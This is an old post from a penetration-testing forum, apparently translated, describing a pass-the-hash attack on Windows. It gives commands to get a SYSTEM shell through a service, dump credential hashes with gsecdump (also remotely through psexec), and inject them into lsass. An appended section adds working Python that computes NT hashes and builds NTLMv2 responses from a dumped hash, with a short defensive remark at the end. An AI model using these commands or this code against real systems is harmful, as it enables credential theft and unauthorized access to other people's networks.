中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
6 Y9 D* V$ g% y! X
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the hash information just grabbed with gsecdump into the local lsass process, and so carry out a hash injection attack. The foreigners really are good at this; administrators are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually do not need the password cracked at all; it is simply a matter of using the tool. As the original article puts it well: whether the password is set to 4 characters or 127 characters, once you have the hash, you can get it done 100%.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
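An added example, not part of the original post or of the truesec article it quotes, to show why the last paragraph's claim holds: NTLM authentication never uses the password itself, only the NT hash, so a dumped hash is a full credential. The block implements MD4 in pure Python (RFC 1320; avoids relying on OpenSSL's legacy provider), derives the NT hash the way Windows does (MD4 over the UTF-16LE password), and then computes and verifies an NTLMv2 challenge-response following MS-NLMP section 3.3.2. The username, domain, password, challenges and timestamp are constructed for the example; the "dumped" hash stands in for what a tool like gsecdump -u would hand you. Only the NT side is shown, since LM hashes need DES, which the standard library lacks.

```python
import hmac
import hashlib
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Windows computes the NT hash as MD4(UTF-16LE(password))."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)   # pad to 56 mod 64
    data += struct.pack("<Q", bit_len)               # 64-bit little-endian length

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                            # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, _rotl(a + f(b, c, d) + X[i], s), b, c
        for i in range(16):                                            # round 2
            k = (i % 4) * 4 + i // 4
            s = (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, _rotl(a + g(b, c, d) + X[k] + 0x5A827999, s), b, c
        for i in range(16):                                            # round 3
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            s = (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, _rotl(a + h(b, c, d) + X[k] + 0x6ED9EBA1, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK,
                          (c0 + c) & MASK, (d0 + d) & MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: the 16-byte NT hash stored in the SAM/AD and dumped by tools like gsecdump."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC_MD5(NT hash, UTF-16LE(UPPER(user) + domain)); MS-NLMP 3.3.2."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """Client side of NTLMv2. Returns (NtChallengeResponse, SessionBaseKey).
    Note the input is the NT hash, never the password."""
    key = ntowf_v2(nt, user, domain)
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


def verify_ntlmv2(stored_nt, user, domain, server_challenge, response):
    """Server side: the DC holds only the NT hash, so the hash is all a client ever needs."""
    key = ntowf_v2(stored_nt, user, domain)
    nt_proof, temp = response[:16], response[16:]
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def pass_the_hash(dumped_hex, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """Attacker side: the only secret input is the dumped hash as hex text."""
    response, _ = ntlmv2_response(bytes.fromhex(dumped_hex), user, domain,
                                  server_challenge, client_challenge, timestamp, target_info)
    return response


def demo():
    # All values below are constructed for this example.
    user, domain = "alice", "CORP"
    password = "correct horse battery staple"          # never seen by the attacker
    server_challenge = bytes.fromhex("0123456789abcdef")
    client_challenge = bytes.fromhex("aaaaaaaaaaaaaaaa")
    timestamp, target_info = 0x01D8ACE000000000, b""   # FILETIME, empty AV_PAIR list
    stored_nt = nt_hash(password)                      # what the SAM/AD holds
    dumped_hex = stored_nt.hex()                        # what a hash dumper prints
    from_password, _ = ntlmv2_response(nt_hash(password), user, domain, server_challenge,
                                       client_challenge, timestamp, target_info)
    from_hash = pass_the_hash(dumped_hex, user, domain, server_challenge,
                              client_challenge, timestamp, target_info)
    return {
        "hash_only_matches_password": from_hash == from_password,
        "server_accepts": verify_ntlmv2(stored_nt, user, domain, server_challenge, from_hash),
    }


if __name__ == "__main__":
    print(nt_hash("password").hex())
    print(demo())
```

The two results from demo() are the whole argument in one place: the response built from the hex hash is byte-for-byte the one a legitimate client would send, and the server accepts it because it too only ever held the hash. Password length and complexity change nothing once the 16 bytes are in hand, which is why tools that load a dumped hash into lsass (the "hash injection" of the title) need no cracking step, and why hash hygiene (no shared local admin passwords, no privileged logons to untrusted hosts) matters more than password length.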

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2